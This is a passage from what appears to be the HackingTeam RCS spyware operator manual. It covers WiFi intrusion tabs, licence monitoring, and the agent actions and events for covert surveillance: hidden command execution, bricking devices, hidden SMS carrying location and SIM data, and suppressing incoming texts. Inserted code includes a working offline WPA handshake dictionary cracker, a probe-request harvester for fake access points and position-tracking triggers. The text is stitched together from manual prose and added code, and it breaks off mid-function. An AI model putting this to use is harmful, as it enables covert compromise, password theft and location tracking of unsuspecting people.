BPF network filter: Used to filter devices more accurately using BPF (Berkeley Packet Filter) syntax. This syntax consists of keywords accompanied by qualifiers. See "What you should know about Tactical Control Center".
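How the two filters narrow the device list, in the "Setting filters on tapped traffic" procedure above and in the two table rows just described, can be seen in the following added example. It is not code from the Tactical Control Center: it takes a few constructed packets from a tapped segment, searches the regular expression in every byte of payload a device sent or received, evaluates a small subset of BPF syntax per packet (host and port primitives with src/dst qualifiers, tcp/udp, and/or/not, parentheses) and lists the hardware addresses that survive both. The packet records, the addresses and the gateway MAC are assumptions made for the example; requiring both filters to hold on the same packet is this example's choice, not necessarily the tool's.

```python
import re
from collections import namedtuple

Packet = namedtuple("Packet", "src_mac dst_mac src_ip dst_ip proto sport dport payload")
GATEWAY_MAC = "00:11:22:33:44:55"  # constructed: the segment's router, never listed as a device
DEV1, DEV2, DEV3 = "aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02", "aa:bb:cc:00:00:03"

# Constructed sample of tapped traffic (not a real capture): three devices on 192.168.1.0/24.
PACKETS = [
    Packet(DEV1, GATEWAY_MAC, "192.168.1.10", "31.13.72.36", "tcp", 50123, 80,
           b"GET / HTTP/1.1\r\nHost: www.facebook.com\r\n\r\n"),
    Packet(GATEWAY_MAC, DEV1, "31.13.72.36", "192.168.1.10", "tcp", 80, 50123,
           b"HTTP/1.1 200 OK\r\nServer: proxygen\r\n\r\n"),
    Packet(DEV2, GATEWAY_MAC, "192.168.1.11", "93.184.216.34", "tcp", 50200, 80,
           b"GET / HTTP/1.1\r\nHost: www.example.org\r\n\r\n"),
    Packet(DEV3, GATEWAY_MAC, "192.168.1.12", "8.8.8.8", "udp", 40000, 53,  # DNS query for www.facebook.com
           b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x03www\x08facebook\x03com\x00\x00\x01\x00\x01"),
]


def _sides(direction, src, dst):  # values a src/dst qualifier applies to; no qualifier: either side
    return {"src": [src], "dst": [dst]}.get(direction, [src, dst])

def _and(a, b): return lambda p: a(p) and b(p)
def _or(a, b): return lambda p: a(p) or b(p)


class _BpfParser:
    """Recursive-descent parser for a BPF subset; 'and' binds tighter than 'or', as in libpcap."""

    def __init__(self, expr):
        self.toks = re.findall(r"\(|\)|[^\s()]+", expr)

    def take(self):
        if not self.toks:
            raise ValueError("unexpected end of BPF expression")
        return self.toks.pop(0)

    def parse_or(self):
        pred = self.parse_and()
        while self.toks[:1] == ["or"]:
            self.take()
            pred = _or(pred, self.parse_and())
        return pred

    def parse_and(self):
        pred = self.parse_primitive()
        while self.toks[:1] == ["and"]:
            self.take()
            pred = _and(pred, self.parse_primitive())
        return pred

    def parse_primitive(self):
        tok = self.take()
        if tok == "(":
            pred = self.parse_or()
            if self.take() != ")":
                raise ValueError("missing ')'")
            return pred
        if tok == "not":
            inner = self.parse_primitive()
            return lambda p: not inner(p)
        if tok in ("tcp", "udp"):
            proto = lambda p, name=tok: p.proto == name
            if self.toks and self.toks[0] in ("src", "dst", "port"):  # "tcp port 80" = tcp and port 80
                return _and(proto, self.parse_primitive())
            return proto
        direction = None
        if tok in ("src", "dst"):  # qualifier: restrict the primitive to one side of the packet
            direction, tok = tok, self.take()
        if tok == "host":
            ip = self.take()
            return lambda p: ip in _sides(direction, p.src_ip, p.dst_ip)
        if tok == "port":
            port = int(self.take())
            return lambda p: port in _sides(direction, p.sport, p.dport)
        raise ValueError(f"unsupported BPF primitive {tok!r}")


def compile_bpf(expr):
    """Per-packet predicate for a BPF expression; raises ValueError on syntax it does not know."""
    parser = _BpfParser(expr)
    pred = parser.parse_or()
    if parser.toks:
        raise ValueError(f"unexpected token {parser.toks[0]!r}")
    return pred


def filter_devices(packets, regex=None, bpf=None):
    """Hardware addresses of devices with at least one packet that satisfies both filters."""
    # The regex is searched in the raw payload, whatever the protocol, of packets the
    # device sent or received; the BPF predicate is evaluated on each packet.
    pred = compile_bpf(bpf) if bpf and bpf.strip() else (lambda p: True)
    pattern = re.compile(regex.encode()) if regex else None
    devices = set()
    for p in packets:
        if pred(p) and (pattern is None or pattern.search(p.payload)):
            devices.update(m for m in (p.src_mac, p.dst_mac) if m != GATEWAY_MAC)
    return sorted(devices)
```

With regex "facebook" alone, both the device that browsed the site over HTTP and the one that merely resolved its name over DNS appear; adding "tcp port 80" keeps only the former, which is the "wider search, then refine" order the procedure describes. A regex is blind to TLS payloads, so on encrypted traffic the BPF side (addresses and ports) is what does the selecting.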
Found device data
Data is described below:
Status: Connected network device status, shown as an icon:
• unknown device. It cannot be infected due to problems tied to authentication. Forcing authentication.
• device being identified.
• device identified and can be infected.
• infected device.
HW address: Device network card hardware (MAC) address.
IP address: Device's network IP address.
Vendor: Network card brand (rather reliable).
Hostname: Device name.
OS: Device operating system.
Browser: Web browser used by the device.
Last web traffic: Last sites visited by the device, detected and analyzed in the last five minutes.
NOTE: if the device no longer generates web traffic at the end of the five minutes, the message Idle appears. This usually occurs when no one is using the device.
Last web attack: Last attack type and results. To check additional details, see the Log System tab.
Wireless Intruder data tab
Data is described below:
Wireless interface: List of non-connected network interfaces. Select the interface to connect to the protected WiFi network to be opened.
ESSID network: Name of the local network to be opened.
Attack type: Types of available password identification:
• WPA dictionary attack: collects handshakes between the client and the access point and tries to discover the password using a dictionary of common words.
• WEP brute-force attack: injects packets, simulating a connected client, to collect data and force the password.
• WPS brute-force attack: tries all the possible combinations to recover the access point settings using the WiFi Protected Setup protocol.
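What the dictionary attack does with the collected handshake can be shown offline. The following added example is not Wireless Intruder's code: it derives the PMK from each candidate passphrase, expands it into the PTK with the two MAC addresses and the two nonces, recomputes the MIC of the second EAPOL-Key message and stops at the first passphrase that reproduces the captured MIC. The SSID, addresses, nonces and dictionary are constructed, and the "captured" frame is built from a known passphrase so the check can be exercised without a real capture.

```python
import hashlib
import hmac
import struct


def pmk_from_passphrase(passphrase, ssid):
    """WPA/WPA2-PSK pairwise master key: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce):
    """IEEE 802.11 PRF-512: expand the PMK with both MACs and both nonces into the 64-byte PTK."""
    data = min(ap_mac, client_mac) + max(ap_mac, client_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def eapol_mic(kck, eapol_frame, key_version):
    """MIC over the whole EAPOL-Key frame with its 16-byte MIC field (offset 81) zeroed.
    Key descriptor version 1 (TKIP) uses HMAC-MD5, version 2 (AES/CCMP) HMAC-SHA1 truncated to 16."""
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    digest = hashlib.md5 if key_version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:16]


def crack_handshake(ssid, ap_mac, client_mac, anonce, snonce, eapol_frame2, dictionary):
    """Offline dictionary attack: the first word whose derived KCK reproduces the captured MIC."""
    key_version = struct.unpack_from(">H", eapol_frame2, 5)[0] & 0x7  # low 3 bits of Key Information
    captured_mic = eapol_frame2[81:97]
    for word in dictionary:
        kck = ptk_from_pmk(pmk_from_passphrase(word, ssid), ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame2, key_version), captured_mic):
            return word
    return None


def build_eapol_frame2(snonce, key_version=2):
    """Constructed message 2 of the 4-way handshake (client -> AP) with an empty MIC field."""
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP/PSK RSN element
    key_info = 0x0108 | key_version  # MIC flag, pairwise key type, descriptor version
    # descriptor type 2 (RSN), key info, key length 16, replay counter 1, SNonce,
    # then Key IV + RSC + Key ID (all zero in message 2) and the zeroed MIC field
    body = struct.pack(">BHHQ", 2, key_info, 16, 1) + snonce + b"\x00" * 32 + b"\x00" * 16
    body += struct.pack(">H", len(rsn_ie)) + rsn_ie
    return struct.pack(">BBH", 1, 3, len(body)) + body  # EAPOL version 1, type 3 = EAPOL-Key


def constructed_capture(passphrase):
    """Stand-in for a captured handshake: the MIC is produced from a known passphrase so the
    example runs offline. Nothing here comes from a real network."""
    ssid, ap_mac, client_mac = "HomeWiFi", bytes.fromhex("001122334455"), bytes.fromhex("aabbcc000001")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    frame = build_eapol_frame2(snonce)
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, client_mac, anonce, snonce)[:16]
    frame = frame[:81] + eapol_mic(kck, frame, 2) + frame[97:]
    return ssid, ap_mac, client_mac, anonce, snonce, frame
```

The handshake leaks no key material directly; the only oracle is the MIC, and each candidate costs 4096 PBKDF2 rounds, which is why the attack type on this tab is a dictionary attack rather than an exhaustive search. The same derivation with a word list of one entry is also how an operator can confirm a recovered passphrase against the capture.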
Fake Access Point data tab
Data is described below:
Wireless interface: List of non-connected network interfaces. Select the interface to be displayed as the WiFi network.
HW address: Device network card hardware address.
Access point: Name of the Access Point expected by the device.
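Step 3 of the emulation procedure above ("recovers the names of the networks devices usually connect to") and the HW address / Access point columns of this tab both rest on the same fact: WiFi clients broadcast the names of networks they remember in 802.11 probe requests. The following added example, which is not Tactical Network Injector's code, parses raw management frames (the radiotap header is assumed to be already stripped) and builds that table from them. The frames are constructed inside the block; a client that only sends wildcard probes reveals no name, and the example leaves it out rather than guessing one.

```python
import struct
from collections import defaultdict

PROBE_REQUEST = 0x40  # 802.11 frame control byte 0: type 0 (management), subtype 4 (probe request)
MGMT_HEADER = "<BBH6s6s6sH"  # frame control, duration, addr1 (DA), addr2 (SA), addr3 (BSSID), seq ctrl


def _mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_probe_request(client_mac, ssid, seq=0):
    """Constructed probe request (no radiotap header) used as sample input; not a real capture."""
    sa = bytes.fromhex(client_mac.replace(":", ""))
    broadcast = b"\xff" * 6
    header = struct.pack(MGMT_HEADER, PROBE_REQUEST, 0, 0, broadcast, sa, broadcast, seq << 4)
    ssid_ie = bytes([0, len(ssid)]) + ssid.encode()  # element ID 0 = SSID
    rates_ie = bytes([1, 4, 0x82, 0x84, 0x8B, 0x96])  # element ID 1 = supported rates
    return header + ssid_ie + rates_ie


def parse_probe_request(frame):
    """(client MAC, SSID) for a directed probe request; None for other frames, wildcard probes
    (empty SSID) and malformed element lists."""
    if len(frame) < struct.calcsize(MGMT_HEADER):
        return None
    fc0, _fc1, _duration, _da, sa, _bssid, _seq = struct.unpack_from(MGMT_HEADER, frame, 0)
    if fc0 != PROBE_REQUEST:
        return None
    pos = struct.calcsize(MGMT_HEADER)
    while pos + 2 <= len(frame):  # walk the tagged elements
        element_id, length = frame[pos], frame[pos + 1]
        value = frame[pos + 2:pos + 2 + length]
        if len(value) < length:  # declared length runs past the end of the frame
            return None
        if element_id == 0:
            ssid = value.decode("utf-8", "replace")
            return (_mac(sa), ssid) if ssid else None
        pos += 2 + length
    return None


def expected_access_points(frames):
    """HW address -> network names the client asked for, in first-seen order: the data the
    Fake Access Point tab shows in its HW address and Access point columns."""
    table = defaultdict(list)
    for frame in frames:
        hit = parse_probe_request(frame)
        if hit and hit[1] not in table[hit[0]]:
            table[hit[0]].append(hit[1])
    return dict(table)


def sample_frames():
    """Constructed capture: two clients probing, a beacon, a wildcard probe and a truncated frame."""
    beacon = bytes([0x80, 0]) + bytes(22) + bytes([0, 8]) + b"HomeWiFi"
    truncated = build_probe_request("aa:bb:cc:00:00:02", "CoffeeShop")[:30]
    return [
        build_probe_request("aa:bb:cc:00:00:01", "HomeWiFi", seq=1),
        build_probe_request("aa:bb:cc:00:00:01", "CoffeeShop", seq=2),
        build_probe_request("aa:bb:cc:00:00:02", "HomeWiFi", seq=7),
        build_probe_request("aa:bb:cc:00:00:02", "", seq=8),
        build_probe_request("aa:bb:cc:00:00:01", "HomeWiFi", seq=3),
        beacon,
        truncated,
    ]
```

Every SSID in the table is one the emulated access point can answer for, which is why the procedure tells you to stop other attacks first and then start the Fake Access Point before selecting the same interface in Network Injector: the device associates with the name it expects, and only then does it appear in the connected-device list.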
System monitoring
Presentation
Introduction
System monitoring guarantees constant control of component status and license usage.
Content
This section includes the following topics:
System monitoring (Monitor) ..100
System monitoring data (Monitor)
System monitoring (Monitor)
To monitor the system: Monitor section
Purpose
This function lets you:
• monitor system status in both hardware and software terms
• monitor the licenses used compared to those purchased
Service call: Contact your HackingTeam Account Manager if additional licenses are required.
What the function looks like
This is what the page looks like:
[Figure: Monitor page, with the areas numbered 1 to 5 described below.]
1: RCS menu. Monitor indicates the current number of system alarms triggered.
2: Window toolbar.
3: List of RCS components and their status:
• Alarm (generates an e-mail sent to the alerting group)
• Warning
• Component running
4: License status.
5: RCS status bar.
To learn more
For interface element descriptions see "Shared interface elements and actions" on page 14.
For a description of the data in this window see "System monitoring data (Monitor)" below.
System monitoring data (Monitor)
System component monitoring data
System monitoring data is described below:
Type, Name: Monitored component type and name: Network Controller, Anonymizer, Database, Collector.
Address: Component's IP address.
Last contact: Last contact date and time.
Status: Component status at last contact:
• Alarm: the component is not running, contact the alerting group for immediate service.
• Warning: the component signals a risky situation, contact the system administrator for the necessary checks.
• Component running.
CPU %: CPU use by the single process.
CPU Total %: CPU use by the server.
Disk Free %: free disk space.
License monitoring data
License monitoring data is described below. For restricted licenses, the format is "x/y", where x is the amount of licenses currently used by the system and y the maximum amount of licenses.
NOTE: if all the licenses are in use, any new agents will be put in queue until a license is freed or new ones are purchased.
License type: Type of license currently in use for agents.
• reusable: an agent's license can be reused after it is uninstalled.
• oneshot: an agent's license is only valid for one installation.
NOTE: the license can only be updated if the user has License modification authorization.
Users: Amount of users currently used by the system and maximum admitted quantity.
Agents: Amount of agents currently used by the system and maximum admitted quantity.
Desktop, Mobile: Amount of desktop and mobile agents currently used by the system and maximum admitted quantities respectively.
Distributed server: Amount of databases currently used by the system and maximum admitted quantity.
Collectors: Amount of Collectors currently used by the system and maximum admitted quantity.
Anonymizers: Amount of Anonymizers currently used by the system and maximum admitted quantity.
Appendix: actions
Presentation
Introduction
An agent is a complex group of events, actions, modules and installation vectors. Single actions are listed below with a detailed description of advanced configuration settings.
Content
This section includes the following topics:
List of sub-actions ..105
Destroy action
Execute action
Log action
SMS action
Synchronize action
Uninstall action ..110
List of sub-actions
Sub-action data description
Sub-actions are described below:
Name: Arbitrary name assigned to an action.
Sub-action: List of sub-action types.
Sub-action type description
Available types of sub-actions are described below (action, device and description):
Destroy: desktop, mobile. Renders the target device unusable.
Execute: desktop, mobile. Runs an arbitrary command on the target machine.
Log: desktop, mobile. Creates a custom message.
SMS (text message): mobile. Sends a hidden SMS from the target device.
Synchronize: desktop, mobile. Runs synchronization with the Collector.
Uninstall: desktop, mobile. Removes the agent from the device.
Destroy action
Purpose
The Destroy action renders the target device temporarily or permanently unusable.
Operating systems
Desktop: Windows, OS X
Mobile: BlackBerry, WinMobile
Parameters
permanent: The device is rendered permanently unusable.
WARNING: the device may need servicing.
Execute action
Purpose
The Execute action runs an arbitrary command on the target machine. Command settings and environment variables can be specified, if required. The program is run with the permissions of the user currently logged into the system.
Any command output can be viewed in the Commands page. See "Command page" on page 44.
WARNING: although all commands are run using the agent's concealment system and are thus invisible, any change in the file system (e.g. a file created on the desktop) will be visible to the user. Be careful.
WARNING: avoid programs that require user interaction or that open graphical interfaces.
Tip: use applications launched by command line or batch file, since their processes (and the corresponding command line window) are hidden by the agent.
Reference to the agent's folder
The $dir$ virtual environment variable, which refers to the agent's (hidden) installation folder, can be added to the command string.
Operating systems
Desktop: Windows, OS X
Mobile: Android, BlackBerry, WinMobile
Significant data
Command: Command to be run. Tip: use an absolute path.
Log action
Purpose
The Log action creates a custom message.
NOTE: custom messages and logs coming from an agent are displayed in the Info section. See "Agent page" on page 41.
Operating systems
Desktop: Windows, OS X
Mobile: Android, BlackBerry, Symbian, WinMobile, Windows Phone
Parameters
Text: Message text that appears in the Info section.
SMS action
Purpose
The SMS action sends a hidden SMS (text message) from the target device with the device position and SIM data.
Operating systems
Mobile: Android, BlackBerry, Symbian, WinMobile
Parameters
Number: Telephone number to which the message is sent.
Text: Message text.
Position: Adds the target's GPS, cell or GSM position to the message.
Sim: Adds the telephone's SIM information to the message.
Synchronize action
Purpose
The Synchronize action synchronizes the agent and the RCS server.
The process is broken down into the following steps:
1. Reciprocal agent/server authentication.
2. Time synchronization with the server.
3. Agent removal in the event the relevant activity is closed.
4. Agent configuration update.
5. Upload of all files in the "upload" queue.
6. Download of all files in the "download" queue.
7. Download of all evidence collected by the agent with simultaneous secure removal.
8. Secure removal of all downloaded evidence from the agent.
Operating systems
Desktop: Windows, OS X
Mobile: Android, BlackBerry, iOS, Symbian, WinMobile, Windows Phone
Desktop settings
Hostname: Name of the Anonymizer or Collector to connect to for synchronization. Select the name of the server or enter the FQDN (DNS name) or IP address in the combo box.
Bandwidth: Maximum bandwidth to be used during synchronization.
Min delay: Minimum delay in seconds from one evidence sent to the next.
Max delay: Maximum delay in seconds from one evidence sent to the next.
Stop on success: If enabled, the sub-action chain is interrupted when synchronization is successfully completed. The remaining sub-actions in the queue are not run.
Mobile settings
Hostname: Anonymizer or Collector name or IP address to connect to for synchronization. Select the name of the server or enter the FQDN (DNS name) or IP address in the combo box.
Stop on success: The sub-action chain is interrupted when synchronization is successfully completed. The remaining sub-actions in the queue are not run.
Type: Connection used for synchronization:
• Internet: via Internet connection.
• Force WiFi: via WiFi network. Forces a WiFi data connection with any open or preset WiFi network available before starting synchronization.
• Force Cell: via cellular network. Forces a GPRS/UMTS/3G data connection with the mobile operator before starting synchronization. APN: specifies the login credentials for the APN the phone can use to collect data. This is useful since it avoids charging the target for the traffic generated by the agent.
IMPORTANT: this method is only supported on BlackBerry and Symbian.
Uninstall action
Purpose
The Uninstall action removes the agent from the target system. All files are deleted.
NOTE: on BlackBerry, removing the agent requires an automatic restart. If the device does not have root privileges on Android, the user must authorize the uninstall. To learn how to check whether you have root privileges, see "What you should know about Android" on page 139.
NOTE: on Windows Phone, removing the agent deletes all files generated by the agent, but the application icon remains in the program list.
Operating systems
Desktop: Windows, OS X
Mobile: Android, BlackBerry, Symbian, WinMobile, Windows Phone
Parameters
None
10
Appendix: events
Presentation
Introduction
An agent is a complex group of events, actions, modules and installation vectors. Single events are listed below with a detailed description of advanced configuration settings.
Content
This section includes the following topics:
Event list ..112
AC event
Battery event
Call event ..114
Connection event
Idle event
Position event ..115
Process event
Quota event
Screensaver event
SimChange event
SMS event
Standby event ..118
Timer event
Window event
WinEvent event ..120
Event list
Event data description
Events are described below:
Data | Description
Enabled | Enables or disables the event.
Name | Name assigned to the event.
Type | Event type list. See the table below.
Event type description
Event types are described below:
Event | Device | Triggers an action when...
AC | mobile | the mobile phone is being charged.
Battery | mobile | the battery charge level is within the specified range.
Call | mobile | a call is made or received.
Connection | desktop, mobile | the agent finds an active network connection.
Idle | desktop | the user does not interact with the computer for a set period of time.
Position | mobile | the device reaches or leaves a specific position.
Process | desktop, mobile | an application is launched or a window is opened on the device.
Quota | desktop | the disk space occupied by evidence on the device exceeds the set limit.
Screensaver | desktop | the screensaver is opened on the target device.
SimChange | mobile | the SIM card is replaced.
SMS (text message) | mobile | a text is received from the indicated number.
Standby | mobile | the device is in stand-by mode.
Timer | desktop, mobile | the specified intervals elapse.
Window | desktop | a window is opened.
WinEvent | desktop | the operating system logs a Windows event.
AC event
Purpose
The AC event triggers an action when the mobile phone is being charged.
Operating systems
Mobile: Android, BlackBerry, Symbian, WinMobile
Parameters
None
Battery event
Purpose
The Battery event triggers an action when the battery charge level is within the specified range.
Tip: to reduce impact on battery use, it is best to link the Battery event, set to the range below 30%, to the Start Crisis and Stop Crisis actions. This way, if the battery charge level drops under the set value, the agent's activities that consume more power will be suspended.
WARNING: the Crisis module can be set to inhibit
Operating systems
Mobile: Android, BlackBerry, Symbian, WinMobile
Parameters
Name | Description
Min | Minimum required battery percentage. Percentages over this limit trigger an event.
Max | Maximum required battery percentage. Percentages under this limit trigger an event.
Call event
Purpose
The Call event triggers an action when a call is made or received.
Operating systems
Mobile: WinMobile, BlackBerry, Symbian, Android
Parameters
Name | Description
Number | Callee's or caller's telephone number (or part of it). Tip: leave blank to trigger on any number.
Connection event
Purpose
The Connection event triggers an action when the agent finds an active network connection.
For the desktop device, enter the connection destination address.
For the mobile device, it triggers an action as soon as the device acquires a valid IP address on any network interface (e.g. WiFi, ActiveSync), and terminates the action when all the connections are terminated.
Operating systems
Desktop: Windows, OS X
Mobile: Android, BlackBerry, Symbian, WinMobile
Mobile settings
None
Desktop settings
Name | Description
IP address | Connection destination IP address. NOTE: enter 0.0.0.0 to indicate any address. NOTE: connections to local addresses in the target's same subnet are not taken into account.
Netmask | Netmask applied to the IP address.
Port | Port used to identify the connection.
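The desktop Connection rule is easy to misread (a 0.0.0.0 address combined with a port, or a netmask wider than intended), so the Python model below evaluates a rule the way the table describes it: the netmask is applied to the destination address, 0.0.0.0 matches any address, and destinations inside the target's own subnet are never taken into account. This is an added example written for this edit, not RCS code; the field names, the treatment of port 0 as "any port", and the constructed list of observed connections are assumptions.

```python
"""Evaluate the desktop Connection event rule against observed connections.

Added example, not RCS code. Models the rule semantics from the table:
IP address + netmask + port, 0.0.0.0 = any address, and destinations on
the target's own subnet are ignored. Field names, "port 0 = any port"
and the sample connection list are assumptions made here.
"""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class ConnectionRule:
    ip: str        # destination address; "0.0.0.0" means any address
    netmask: str   # netmask applied to `ip`
    port: int      # destination port; 0 is treated here as "any port" (assumption)

    def network(self) -> ipaddress.IPv4Network:
        return ipaddress.IPv4Network(f"{self.ip}/{self.netmask}", strict=False)


def connection_matches(rule, dst_ip, dst_port, local_ip, local_netmask):
    """True if a connection to (dst_ip, dst_port) would trigger `rule`
    on a target whose own address is local_ip/local_netmask."""
    dst = ipaddress.IPv4Address(dst_ip)
    local_net = ipaddress.IPv4Network(f"{local_ip}/{local_netmask}", strict=False)
    if dst in local_net:
        return False            # same-subnet destinations are never considered
    if rule.port and dst_port != rule.port:
        return False
    if rule.ip == "0.0.0.0":
        return True             # any (non-local) address
    return dst in rule.network()


def first_trigger(rule, connections, local_ip, local_netmask):
    """Return the first (dst_ip, dst_port) that triggers the rule, or None."""
    for dst_ip, dst_port in connections:
        if connection_matches(rule, dst_ip, dst_port, local_ip, local_netmask):
            return (dst_ip, dst_port)
    return None


# Constructed sample: target at 192.168.1.10/24 observing three connections.
LOCAL_IP, LOCAL_MASK = "192.168.1.10", "255.255.255.0"
SAMPLE_CONNECTIONS = [
    ("192.168.1.20", 443),   # same subnet: ignored even though the port matches
    ("203.0.113.5", 80),
    ("203.0.113.7", 443),
]
HTTPS_TO_NET = ConnectionRule("203.0.113.0", "255.255.255.0", 443)
ANY_CONNECTION = ConnectionRule("0.0.0.0", "0.0.0.0", 0)

if __name__ == "__main__":
    print(first_trigger(HTTPS_TO_NET, SAMPLE_CONNECTIONS, LOCAL_IP, LOCAL_MASK))
    print(first_trigger(ANY_CONNECTION, SAMPLE_CONNECTIONS, LOCAL_IP, LOCAL_MASK))
```

With the sample data the /24 rule on port 443 fires on 203.0.113.7 only, because the 192.168.1.20 connection is on the target's subnet and is skipped, while the 0.0.0.0 rule fires on the first non-local connection regardless of port.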
Idle event
Purpose
The Idle event triggers an action when the user does not interact with the computer for a set period of time.
Operating systems
Desktop: Windows, OS X
Parameters
Name | Description
Time | Seconds of inactivity. The event is triggered at the end of this time.
Position event
Purpose
The Position event triggers an action when the target reaches or leaves a specific position. The position can be defined by GPS coordinates and a range, or by a GSM cell ID.
Operating systems
Mobile: Android, BlackBerry, Symbian, WinMobile, Windows Phone
Parameters
Name | Description
Type | Type of position to be used.
GPS: Latitude, Longitude (coordinates) and Distance (range from the coordinates).
GSM Cell (all operating systems except Windows Phone): Country, Network, Area, ID (GSM cell data). Enter the wildcard character to wildcard a field. For example, if the Country field is entered and the three other fields are wildcarded, the event is triggered when the device enters or exits the specified country.
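Both position types above are transition rules: the GPS type fires when the device crosses the Distance boundary around the point, and the GSM type fires when the current cell starts or stops matching the (possibly wildcarded) fields. The Python below is an added example written for this edit, not RCS code; it uses the haversine great-circle distance for the GPS range, assumes "*" as the wildcard marker, and evaluates constructed sample fixes and cells.

```python
"""Position event rules evaluated against a stream of position fixes.

Added example, not RCS code. Models the two position types from the
parameter table: a GPS point with a Distance range (firing on enter and
leave transitions) and a GSM cell with wildcarded fields. The "*" wildcard
marker, the fix/cell layout and the sample data are assumptions made here.
"""
import math

WILDCARD = "*"              # assumed marker for a wildcarded GSM cell field
EARTH_RADIUS_M = 6371000.0
CELL_FIELDS = ("country", "network", "area", "id")


def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres between two WGS84 coordinates."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dp = math.radians(lat2 - lat1)
    dl = math.radians(lon2 - lon1)
    a = math.sin(dp / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dl / 2) ** 2
    return 2 * EARTH_RADIUS_M * math.asin(math.sqrt(a))


def gps_transitions(lat, lon, distance_m, fixes):
    """Return ("enter"|"leave", fix index) events for a GPS rule.

    `fixes` is a time-ordered list of (lat, lon). The event fires on the
    transition across the Distance boundary, not on every fix inside it.
    """
    events, inside = [], None
    for i, (flat, flon) in enumerate(fixes):
        now_inside = haversine_m(lat, lon, flat, flon) <= distance_m
        if inside is not None and now_inside != inside:
            events.append(("enter" if now_inside else "leave", i))
        inside = now_inside
    return events


def cell_matches(rule, cell):
    """GSM cell rule: every field must equal the observed value or be wildcarded."""
    return all(rule[k] == WILDCARD or str(rule[k]) == str(cell[k]) for k in CELL_FIELDS)


def cell_transitions(rule, cells):
    """Return ("enter"|"leave", index) events as the serving cell changes."""
    events, inside = [], None
    for i, cell in enumerate(cells):
        now_inside = cell_matches(rule, cell)
        if inside is not None and now_inside != inside:
            events.append(("enter" if now_inside else "leave", i))
        inside = now_inside
    return events


# Constructed sample data: a 500 m range around a point in central Milan,
# and a "whole country" GSM rule (country code only, other fields wildcarded).
RULE_POINT = (45.4642, 9.1900, 500.0)
SAMPLE_FIXES = [(45.4700, 9.2100), (45.4650, 9.1910), (45.4645, 9.1905), (45.4800, 9.2200)]
COUNTRY_ONLY_RULE = {"country": "222", "network": WILDCARD, "area": WILDCARD, "id": WILDCARD}
SAMPLE_CELLS = [
    {"country": 222, "network": 10, "area": 5, "id": 777},
    {"country": 222, "network": 10, "area": 6, "id": 912},
    {"country": 234, "network": 15, "area": 1, "id": 4001},
]

if __name__ == "__main__":
    print(gps_transitions(*RULE_POINT, SAMPLE_FIXES))
    print(cell_transitions(COUNTRY_ONLY_RULE, SAMPLE_CELLS))
```

The first fix is about 1.7 km from the point and the last about 2.9 km, so the GPS rule reports an enter at fix 1 and a leave at fix 3; the country-only cell rule stays matched while the area and ID change and reports a leave only when the country code changes.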
Process event
Purpose
The Process event triggers an action when an application is launched or a window is opened on the device.
Operating systems
Desktop: Windows, OS X
Mobile: Android, BlackBerry, Symbian, WinMobile
Parameters
Name | Description
Type | Process Name: the event triggers an action when the specified process is launched. Window Title: the event triggers an action when focus is given to the specified window.
String | Name or part of the program name or window title. Tip: use wildcard characters when specifying a program (e.g. "*Calculator*").
On Focus | (desktop only) If selected, the event triggers the action only when the process or window is in the foreground.
Quota event
Purpose
The Quota event triggers an action when the device's disk space used to store the collected evidence exceeds the set limit.
When disk space falls under the limit, the action will be terminated at the next
Operating systems
Desktop: Windows
Parameters
The disk space to be used to store the collected evidence.
Screensaver event
Purpose
The Screensaver event triggers an action when the target device runs the screensaver.
Operating systems
Desktop: Windows, OS X
Parameters
None
SimChange event
Purpose
The SimChange event triggers an action when the SIM card is changed.
Operating systems
Mobile: Android, BlackBerry, Symbian, WinMobile
Parameters
None
SMS event
Purpose
The SMS event triggers an action when a specific text message is received from the specified number. The message will not be shown among the received messages on the phone.
WARNING: incoming messages are only deleted on BlackBerry OS
NOTE: the received message is not displayed on the target device.
Operating systems
Mobile: Android, BlackBerry, Symbian
Parameters
Name | Description
Number | SMS sender's phone number. Any SMS from this number will be hidden.
Text | Part of the message text that must match. IMPORTANT: the string is not case sensitive.
Standby event
Purpose
The Standby event triggers an action when the device enters stand-by mode (backlight off).
Operating systems
Mobile: Android, BlackBerry, Symbian, WinMobile
Parameters
None
Timer event
Purpose
The Timer event triggers an action at the indicated intervals.
When the event occurs, the action linked to the Start connector is run. During the time between event start and stop, the Repeat action is repeated at the interval specified by the relevant connector. When the event terminates, the Stop action is run.
Operating systems
Desktop: Windows, OS X
Mobile: Android, BlackBerry, iOS, Symbian, WinMobile, Windows Phone
Parameters
Name | Description
Type | Interval type:
- Loop: triggers an action, indefinitely repeating it at every interval, as specified by the Repeat action.
- Daily: triggers a daily action at the times indicated in From and To.
- Date: triggers an action in the period indicated in From and To. NOTE: select Forever for continuous action.
- triggers an action after a certain number of days (Days) from agent installation.
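The four Type values above give one Start/Stop window each, with the Repeat connector firing on its own interval inside it. The Python below is an added example written for this edit, not RCS code; it decides whether a rule is active at a sampled instant, lists the Start/Stop transitions over a series of instants, and counts Repeat firings for a Loop. The dict layout, the lowercase type names, and the "install" name used for the days-after-installation type are assumptions, as is the constructed installation date.

```python
"""Timer event types modelled as schedule logic.

Added example, not part of the RCS guide. A rule is a dict mirroring the
manual's fields (Type, From, To, Forever, Days); the dict layout, the
lowercase type names and the "install" name for the days-after-installation
type are assumptions made here.
"""
from datetime import datetime, time, timedelta


def timer_active(rule, now, installed_at):
    """True while the timer is between its Start and Stop at instant `now`."""
    kind = rule["type"]
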